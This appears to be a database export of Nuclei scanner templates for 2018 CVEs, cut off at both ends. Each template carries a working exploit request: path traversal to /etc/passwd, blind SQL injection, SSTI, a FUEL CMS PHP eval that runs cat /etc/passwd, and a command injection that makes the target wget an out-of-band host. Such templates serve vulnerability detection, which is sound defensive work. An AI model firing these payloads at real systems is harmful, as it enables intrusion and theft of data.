/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"ddbb3e76f92e78c445c8ecb392beb225\" # MD5 of CVE-2018-15961\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022079a0f0e0bdc7376e1343de468e02f8dd25505916ea291f52a4b4672bb49f58c6022045414437bbe18a49102cd5f18a1434331c158de4796d2340acbe64d8b9f82767:922c64590222798bb761d5b6d8e72950", "hash": "1003fa4126fa25e60e4204cb1f45c1c9", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308054" }, "name": "CVE-2018-16059.yaml", "content": "id: CVE-2018-16059\n\ninfo:\n name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in WirelessHART Fieldgate SWG70 3.0.\n reference:\n - https://www.exploit-db.com/exploits/45342\n - https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16059\n - https://www.exploit-db.com/exploits/45342/\n - https://cert.vde.com/en-us/advisories/vde-2019-002\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2018-16059\n cwe-id: CWE-22\n epss-score: 0.32871\n epss-percentile: 0.96924\n cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: endress\n product: wirelesshart_fieldgate_swg70_firmware\n tags: cve,cve2018,iot,lfi,edb,endress\n\nhttp:\n - method: POST\n path:\n - 
\"{{BaseURL}}/fcgi-bin/wgsetcgi\"\n\n body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220796e5a1f1956c4523eb569daf5b1a0a1faebc2f72247418812931a5e68277d980220772cd55cfb046e365847adba5643a19a0e9462d49ac46b936262e094587b2f92:922c64590222798bb761d5b6d8e72950", "hash": "678b65833f73a3faa8b5da93c1d63766", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308055" }, "name": "CVE-2018-16133.yaml", "content": "id: CVE-2018-16133\n\ninfo:\n name: Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion\n author: 0x_Akoko\n severity: medium\n description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3.\n reference:\n - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html\n - http://www.cybrotech.com/\n - https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16133\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2018-16133\n cwe-id: CWE-22\n epss-score: 0.03629\n epss-percentile: 0.91461\n cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cybrotech\n product: cybrohttpserver\n tags: cve2018,cve,lfi,packetstorm,cybrotech\n\nhttp:\n - raw:\n - |+\n GET 
\\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\n Host: {{Hostname}}\n\n unsafe: true\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 4b0a00483046022100bec0bd28d03a8668e238050338b250954c84ef14d63693d29d23164a96eb7940022100e7a8f25d4206e7b85164c393af308c6186954abe8b02b180e84a80b946227f50:922c64590222798bb761d5b6d8e72950", "hash": "f52a73a15a8e2b9adc06e758a00fc836", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308056" }, "name": "CVE-2018-16139.yaml", "content": "id: CVE-2018-16139\n\ninfo:\n name: BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting\n author: atomiczsec\n severity: medium\n description: |\n BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest patch or upgrade to a newer version of BIBLIOsoft BIBLIOpac 2008 that addresses the XSS vulnerability.\n reference:\n - https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16139\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-16139\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.47838\n cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: bibliosoft\n product: bibliopac\n shodan-query: title:\"Bibliopac\"\n tags: cve,cve2018,xss,bibliopac,bibliosoft\n\nhttp:\n - method: GET\n path:\n - 
'{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\">'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">.xrf'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022033723090a9b4a81b792ed6ecdaf230faf72fd66022ed67fae3697f90eff3b012022043a029915f1b514beac428b24c0629be457217dbe22ec11838076265cb09e9a5:922c64590222798bb761d5b6d8e72950", "hash": "33f9f36cbb5614fb213bc8389bc4ab1f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308057" }, "name": "CVE-2018-16159.yaml", "content": "id: CVE-2018-16159\n\ninfo:\n name: WordPress Gift Voucher <4.1.8 - Blind SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Gift Vouchers plugin before 4.1.8 contains a blind SQL injection vulnerability via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.\n remediation: Fixed in version 4.1.8.\n reference:\n - https://wpscan.com/vulnerability/9117\n - https://wordpress.org/plugins/gift-voucher/\n - https://www.exploit-db.com/exploits/45255/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16159\n - https://wpvulndb.com/vulnerabilities/9117\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-16159\n cwe-id: CWE-89\n epss-score: 0.01228\n epss-percentile: 0.85084\n cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: codemenschen\n product: gift_vouchers\n framework: wordpress\n tags: 
cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n action=wpgv_doajax_front_template&template_id=1 and sleep(6)#\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"application/json\")'\n - 'contains(body, \"images\") && contains(body, \"title\")'\n condition: and\n# digest: 4a0a0047304502202b1aa5555d71a8aca48bc022946bcdce1d30c66d55e0d3674a071d4f71c612ee022100956080f91d3386d400a3993d774251f5a2649171c661633597a767552865238a:922c64590222798bb761d5b6d8e72950", "hash": "8ec496ff8263a930bd4a2e220e560d58", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308058" }, "name": "CVE-2018-16167.yaml", "content": "id: CVE-2018-16167\n\ninfo:\n name: LogonTracer <=1.2.0 - Remote Command Injection\n author: gy741\n severity: critical\n description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.\n remediation: |\n Upgrade LogonTracer to a version higher than 1.2.0.\n reference:\n - https://www.exploit-db.com/exploits/49918\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16167\n - https://jvn.jp/en/vu/JVNVU98026636/index.html\n - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-16167\n cwe-id: CWE-78\n epss-score: 0.27457\n epss-percentile: 0.9669\n cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jpcert\n product: logontracer\n tags: 
cve,cve2018,rce,oast,edb,logontracer,intrusive,jpcert\n\nhttp:\n - raw:\n - |\n POST /upload HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - http\n# digest: 490a004630440220391e666a4ba5604bb62fcd1ca7396a502fb6f43913e9cd3c14529faf765f1464022047bf7f2d790f04727bd7e93e901f9af13a8077b286023e0a843688319ccf9df5:922c64590222798bb761d5b6d8e72950", "hash": "de6551c90f93ee4338896d5d93d68386", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308059" }, "name": "CVE-2018-16283.yaml", "content": "id: CVE-2018-16283\n\ninfo:\n name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion\n author: 0x240x23elu\n severity: critical\n description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter.\n remediation: |\n Update to the latest version of the WordPress Plugin Wechat Broadcast or apply the patch provided by the vendor to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/45438\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16283\n - https://github.com/springjk/wordpress-wechat-broadcast/issues/14\n - http://seclists.org/fulldisclosure/2018/Sep/32\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/150202\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-16283\n cwe-id: CWE-22\n epss-score: 0.0412\n epss-percentile: 0.91963\n cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wechat_brodcast_project\n product: wechat_brodcast\n framework: wordpress\n tags: cve,cve2018,edb,seclists,wordpress,wp-plugin,lfi,wechat_brodcast_project\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd\"\n\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 490a004630440220566093a92cc8bec90dea2dd4f78b4c6393324f9ae1a6508694ae7ab1961555bd022016fd5d0fb9f8a0483755d3735220fde2bfc22fa1d4ab1e2934215495ccddd3e8:922c64590222798bb761d5b6d8e72950", "hash": "89af3627bd61f51e1c3587e4c984a6f3", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30805a" }, "name": "CVE-2018-16288.yaml", "content": "id: CVE-2018-16288\n\ninfo:\n name: LG SuperSign EZ CMS 2.5 - Local File Inclusion\n author: daffainfo\n severity: high\n description: |\n LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of LG SuperSign EZ CMS.\n reference:\n - https://www.exploit-db.com/exploits/45440\n - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16288\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cve-id: CVE-2018-16288\n cwe-id: CWE-200\n epss-score: 0.12055\n epss-percentile: 0.95227\n cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: lg\n product: supersign_cms\n tags: cve,cve2018,lfi,supersign,edb,lg\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
490a0046304402206c44f04d87cd0bb24833f17912104c4fe7f11064d15ad1ec47e91daedda230a402203c5b59f016c1ab24a2a0f0531c04b7fdab6907c1d028f7c976fef3bf42f929eb:922c64590222798bb761d5b6d8e72950", "hash": "3e9e4bcff701b90dd76de34258525801", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30805b" }, "name": "CVE-2018-16299.yaml", "content": "id: CVE-2018-16299\n\ninfo:\n name: WordPress Localize My Post 1.0 - Local File Inclusion\n author: 0x_Akoko,0x240x23elu\n severity: high\n description: |\n WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Update to the latest version of WordPress Localize My Post plugin.\n reference:\n - https://www.exploit-db.com/exploits/45439\n - https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.html\n - https://github.com/julianburr/wp-plugin-localizemypost/issues/1\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16299\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-16299\n cwe-id: CWE-22\n epss-score: 0.02738\n epss-percentile: 0.89516\n cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: localize_my_post_project\n product: localize_my_post\n framework: wordpress\n tags: cve2018,cve,wordpress,lfi,plugin,wp,edb,packetstorm,localize_my_post_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022056d51d6fc9cfa3c7640e2cf5f87480ff24276f614122fe0d7b013a4a15c55153022100fb25142662e4c537cc01d2effca6acbfed88d9958dfe32e560e6bc7954914d4c:922c64590222798bb761d5b6d8e72950", "hash": "2c751c66090165692c2807d7b441f6af", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30805c" }, "name": "CVE-2018-16341.yaml", "content": "id: CVE-2018-16341\n\ninfo:\n name: Nuxeo <10.3 - Remote Code Execution\n author: madrobot\n severity: high\n description: |\n Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade Nuxeo to version 10.3 or later to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16299\n classification:\n cve-id: CVE-2018-16341\n metadata:\n max-request: 1\n tags: cve,cve2018,nuxeo,ssti,rce,bypass\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"31333333337\"\n# digest: 490a00463044022017a2a773e0a8c43949c4027d6437f57793abc123d2c7261c898df8c37a3837af02206bcaf8386cd8920db888038d5d0ee827d956b2cc5222be63bb1649ac54c8d3a5:922c64590222798bb761d5b6d8e72950", "hash": "71e4ffc41a2cdb742d83af4ee8f066fa", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30805d" }, "name": "CVE-2018-16668.yaml", "content": "id: CVE-2018-16668\n\ninfo:\n name: CirCarLife <4.3 - Improper Authentication\n author: geeknik\n severity: medium\n description: CirCarLife before 4.3 is susceptible to improper authentication. An internal installation path disclosure exists due to the lack of authentication for /html/repository.System. 
An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, compromising the confidentiality and integrity of the system.\n remediation: |\n Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue.\n reference:\n - https://www.exploit-db.com/exploits/45384\n - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life\n - https://www.exploit-db.com/exploits/45384/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16668\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2018-16668\n cwe-id: CWE-287\n epss-score: 0.00189\n epss-percentile: 0.55432\n cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: circontrol\n product: circarlife_scada\n tags: cve,cve2018,circarlife,scada,iot,disclosure,edb,circontrol\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/html/repository\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"CirCarLife Scada\"\n\n - type: word\n part: body\n words:\n - \"** Platform sources **\"\n - \"** Application sources **\"\n condition: and\n# digest: 4b0a004830460221008a613403e95cd869d597b3567f9774508802b578940d4923d3e724796ed4a51d022100e7705c676701af5b47545de5a166c31d2a905825dee9546405c3aa21ab76d712:922c64590222798bb761d5b6d8e72950", "hash": "b6d32ad30f20cab7b2cfc20c07339782", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30805e" }, "name": "CVE-2018-16670.yaml", "content": "id: CVE-2018-16670\n\ninfo:\n name: CirCarLife <4.3 - Improper Authentication\n author: geeknik\n severity: medium\n description: CirCarLife before 4.3 is susceptible to improper authentication. 
A PLC status disclosure exists due to lack of authentication for /html/devstat.html. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n remediation: |\n Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue.\n reference:\n - https://www.exploit-db.com/exploits/45384\n - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life\n - https://www.exploit-db.com/exploits/45384/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16670\n - https://github.com/20142995/sectool\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2018-16670\n cwe-id: CWE-287\n epss-score: 0.00169\n epss-percentile: 0.53916\n cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: circontrol\n product: circarlife_scada\n tags: cve,cve2018,scada,plc,iot,disclosure,edb,circarlife,circontrol\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/services/user/values.xml?var=STATUS\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"CirCarLife Scada\"\n\n - type: word\n part: body\n words:\n - \"\"\n - \"Reader.STATUS\"\n condition: and\n# digest: 4b0a00483046022100e9a92579c1c238310ebd4e5b286c2be5996bb424926707aebfc53c1affabef01022100bdbe95d2ea918c7a717174f6195a801e2354131f423ac56e578321d1e3cc3cdc:922c64590222798bb761d5b6d8e72950", "hash": "40158363fc665e07de68e24e5fec1cb3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30805f" }, "name": "CVE-2018-16671.yaml", "content": "id: CVE-2018-16671\n\ninfo:\n name: CirCarLife <4.3 - Improper Authentication\n author: geeknik\n severity: medium\n description: CirCarLife before 4.3 is susceptible to improper authentication. A system software information disclosure exists due to lack of authentication for /html/device-id. 
An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, compromising the confidentiality and integrity of the system.\n remediation: |\n Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue.\n reference:\n - https://www.exploit-db.com/exploits/45384\n - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16671\n - https://github.com/20142995/sectool\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2018-16671\n cwe-id: CWE-200\n epss-score: 0.00189\n epss-percentile: 0.55432\n cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: \"circontrol\"\n product: circarlife_scada\n tags: cve2018,cve,iot,disclosure,edb,circarlife,scada,circontrol\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/html/device-id\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"CirCarLife Scada\"\n\n - type: word\n part: body\n words:\n - \"circontrol\"\n\n - type: regex\n part: body\n regex:\n - \"(19|20)\\\\d\\\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])\"\n# digest: 4a0a00473045022100bb761bd732caa4633175fb277ae6cb5413db1b1f38be0f5a60575eb0ac8fcc52022069ee62eab829a913c99b59cb9268d67426dd4012e8ebcaf33d69fe06bb0422de:922c64590222798bb761d5b6d8e72950", "hash": "e810883c6782b09aee95c5186df88845", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308060" }, "name": "CVE-2018-16716.yaml", "content": "id: CVE-2018-16716\n\ninfo:\n name: NCBI ToolBox - Directory Traversal\n author: 0x_Akoko\n severity: critical\n description: NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via 
viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.\n impact: |\n An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.\n remediation: |\n Apply the latest patch or update from the vendor to fix the directory traversal vulnerability in the NCBI ToolBox.\n reference:\n - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16716\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/grymer/CVE\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 9.1\n cve-id: CVE-2018-16716\n cwe-id: CWE-22\n epss-score: 0.00543\n epss-percentile: 0.74952\n cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: nih\n product: ncbi_toolbox\n tags: cve,cve2018,ncbi,lfi,nih\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022018fd3deeccb83eb769fde94c8460fb450d314b6cd1d5f09e5e6673e66c1f30d5022100e35701ec81596fff8cae290f6d481ccbebcaeb0da6573b1f149d30d8f945a163:922c64590222798bb761d5b6d8e72950", "hash": "5310454d1653df953fe6075cf60a925d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308061" }, "name": "CVE-2018-16761.yaml", "content": "id: CVE-2018-16761\n\ninfo:\n name: Eventum <3.4.0 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n Eventum before 3.4.0 contains an open redirect vulnerability. 
An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.\n remediation: |\n Upgrade to Eventum version 3.4.0 or later to fix the open redirect vulnerability.\n reference:\n - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/\n - https://github.com/eventum/eventum/releases/tag/v3.4.0\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16761\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-16761\n cwe-id: CWE-601\n epss-score: 0.00068\n epss-percentile: 0.28116\n cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: eventum_project\n product: eventum\n tags: cve,cve2018,redirect,eventum,oss,eventum_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/select_project.php?url=http://interact.sh'\n - '{{BaseURL}}/clock_status.php?current_page=http://interact.sh'\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4b0a00483046022100e1983ab57aad7d2f22f2ba0dea11509f38177f73e307a187c6b61e4dd913d631022100b3efb8776bfa1c1caa13f75f339008475a607f5169e8984cd452e62791d91515:922c64590222798bb761d5b6d8e72950", "hash": "134a99bee04b61bfe184a4bc3cf8bcd7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308062" }, "name": "CVE-2018-16763.yaml", "content": "id: CVE-2018-16763\n\ninfo:\n name: FUEL CMS 1.4.1 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the 
pages/select/ filter parameter or the preview/ data parameter.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system, leading to complete compromise of the application and potentially the underlying server.\n remediation: |\n Upgrade to FUEL CMS version 1.4.2 or later, which includes a patch for this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/47138\n - https://www.getfuelcms.com/\n - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16763\n - https://github.com/daylightstudio/FUEL-CMS/issues/478\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-16763\n cwe-id: CWE-74\n epss-score: 0.83285\n epss-percentile: 0.98356\n cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: thedaylightstudio\n product: fuel_cms\n tags: cve,cve2018,fuelcms,rce,edb,thedaylightstudio\n\nhttp:\n - raw:\n - |\n GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100aa22ae2b5004894a2274f6ac1b4e153cdcd9a2081a3e84d0853a7612a808693f02202177babac08cedd1a18e2d633c4f2705131f42a6354c14302ec02ebddbfdaf1e:922c64590222798bb761d5b6d8e72950", "hash": "82c05868fd5643f5a283efd3aa2f2db6", "level": 6, "time": "2024-05-17 